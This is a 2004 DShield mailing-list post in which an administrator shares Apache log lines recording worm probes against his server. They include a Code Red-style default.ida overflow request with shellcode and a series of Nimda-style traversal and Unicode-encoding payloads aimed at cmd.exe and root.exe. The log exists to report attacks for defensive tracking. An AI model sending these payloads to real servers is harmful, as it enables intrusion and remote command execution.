[Dshield] Look at this Nitwit

David Hart DavidHart at TQMcube.com
Wed Jan 28 20:42:43 GMT 2004


Apache log:

pcp03063113pcs.newlaf01.mi.comcast.net - - [28/Jan/2004:07:51:32 -0500]
"GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 987 "-" "-"
pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:26 -0500]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:27 -0500]
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:27 -0500]
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:28 -0500]
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:28 -0500]
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973
"-" "-"
pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:28 -0500]
"GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 973 "-" "-"
pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:28 -0500]
"GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 973 "-" "-"
pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:29 -0500]
"GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973 "-" "-"
pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:29 -0500]
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973
"-" "-"
pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:29 -0500]
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973
"-" "-"
pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:29 -0500]
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973
"-" "-"
pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:30 -0500]
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973
"-" "-"
pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:30 -0500]
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
906 "-" "-"
pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:30 -0500]
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 906
"-" "-"
pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:31 -0500]
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
973 "-" "-"
pcp03324418pcs.sothfd01.mi.comcast.net - - [28/Jan/2004:10:49:31 -0500]
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 973
"-" "-"

                               ---------
            Quality Management - A Commitment to Excellence
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://www.dshield.org/pipermail/list/attachments/20040128/6ec9e12f/attachment.bin


More information about the list mailing list